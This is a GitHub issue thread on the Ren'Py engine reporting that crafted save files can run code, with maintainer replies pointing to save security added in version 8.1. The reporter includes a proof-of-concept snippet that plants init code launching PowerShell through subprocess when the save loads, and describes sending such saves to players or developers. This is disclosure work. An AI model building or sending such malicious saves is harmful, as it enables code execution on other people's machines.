
Vulnerability in save files #4879

Closed
malikiz opened this issue Jul 30, 2023 · 4 comments
Labels
done? The issue or bug has likely already been addressed or solved.

Comments

@malikiz

malikiz commented Jul 30, 2023

With the help of the features of the engine and how the game saves work, it is possible to introduce injections of malicious code.

How:
The engine has a renpy.run method that can execute any script from a string. Further in the game, you can rewrite any method in the game that is declared in the label, using the Function class, which is designed for actions in screens.

And what do we have:

```python
init python:
    def inject():
        code_to_inject = ("""
init python:
    import subprocess
    import requests

    subprocess.Popen(["powershell", "-Command",
            'any command here'
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=True,
    )

    subprocess = None
""")
```

```python
        actions = [
            Function(renpy.load_string, code_to_inject, "scripts/asd.rpy")
        ]

        any_object.custom_method = Function(renpy.run, actions)
```

Next, the inject() function is executed in the game console, then a save is made. The attacker can transfer this save to the victim in order to harm them. After that, this method will be called in the game; it will be called with one hundred percent probability if it is used in the after_load label. Players often ask someone on the Internet for a save file, especially if an update has been released for some game and the player has lost his saves. An attacker can take advantage of this situation and send him a malicious save file. So far I don't have any good ideas on how this could be solved without complicating the life of game developers.

@Gouvernathor
Member

That's why we have save security: saves are flagged with the ID of the computer that generated them, so when you try to load a save that has a different flag than your computer, or that has no flag, you are asked to confirm that you are sure of the origin of the save file.

@Gouvernathor Gouvernathor added the done? The issue or bug has likely already been addressed or solved. label Jul 30, 2023
@renpytom
Member

Correct, this is the point of the save security in 8.1. If people accept a save file from random people on the internet, that's the problem.

@malikiz
Author

malikiz commented Jul 30, 2023

I also want to say why this is important. In addition to players being victims, a game developer can become a victim. The game developer may ask the player to send a save file to reproduce the bug that the player allegedly found. And the developer can fall for it and transfer his data to an attacker.

@renpytom
Member

renpytom commented Jul 31, 2023

Game developers see the same messages players do. The changes in 8.1 are intended to make everyone aware that taking saves from people you don't trust is risky.
